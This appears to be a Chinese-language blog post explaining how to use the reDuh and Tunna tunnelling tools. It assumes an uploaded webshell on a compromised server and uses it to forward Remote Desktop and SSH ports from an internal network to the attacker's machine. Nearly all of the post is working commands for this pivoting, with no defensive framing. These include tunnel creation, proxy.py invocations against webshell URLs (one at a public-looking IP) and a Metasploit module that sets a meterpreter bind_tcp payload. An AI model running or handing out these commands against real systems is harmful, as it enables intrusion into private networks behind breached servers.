1. 程式人生 > >內網穿透工具Tunna和reDuh

內網穿透工具Tunna和reDuh

內網穿透工具;Tunna和reDu


1.1reDuh

下載地址:https://github.com/sensepost/reDuh

1.reDuh使用條件

(1)獲取目標服務器webshell,且可以上傳reDuh服務端對應腳本文件。

(2)知道目標服務器開放的內網端口,如遠程桌面的端口是3389。

(3)目標服務器網絡做了端口策略限制,只允許外部訪問內網的80等特定端口。

2. reDuh使用命令

(1)本地具備java環境,可以使用pentestbox自帶java環境

java -jar reDuhClient.jar http://somesite.com/reDuh.aspx http or https port

(2)本地連接1010端口

nc -vv localhost 1010

(3)在java命令窗口執行

[createTunnel]1234:127.0.0.1:3389

(4)使用mstsc登錄127.0.0.1:1234

1.2Tunna

https://github.com/SECFORCE/Tunna

(1)連接3389

python proxy.py -u http://172.0.0.1/conn.aspx -l 1234 -r 3389 –v

通過查看網上相關文章,只見conn.jsp和conn.php實現端口轉發成功

通過該方法訪問內網的其他服務器,命令如下:

python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389

172.0.0.1是webshell所在服務器,172.0.0.2是內網訪問的服務器,3389為遠程終端端口,有些服務器修改器默認端口為其它端口。本地直接登錄遠程終端地址127.0.0.1:1234即可。參數含義如下:

-l 表示本地監聽的端口

-r 遠程要轉發的端口

-v 詳細模式

2.連接SSH

對於SSH服務需要添加-s參數,才能保證連接的時候不會中斷,執行命令:

python proxy.py -u http://218.4.45.152:8877/job/conn.aspx -l 1234 -r 22 -v –s

在本地使用ssh連接1234端口即可:

ssh localhost -p 1234

3.MSF利用tunna轉發

將tunna_exploit.rb拷貝到msf的modules/exploits/windows/misc目錄.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

msf > use exploit/windows/misc/tunna_exploit

msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp

PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(tunna_exploit) > set RHOST 1.3.3.7 //註意這裏是指本地的公網IP

RHOST => 1.3.3.7

msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp

TARGETURI => http://219.x.x.x:8080/conn.jsp

msf exploit(tunna_exploit) > set VERBOSE true

VERBOSE => true

msf exploit(tunna_exploit) > exploit –j


內網穿透工具Tunna和reDuh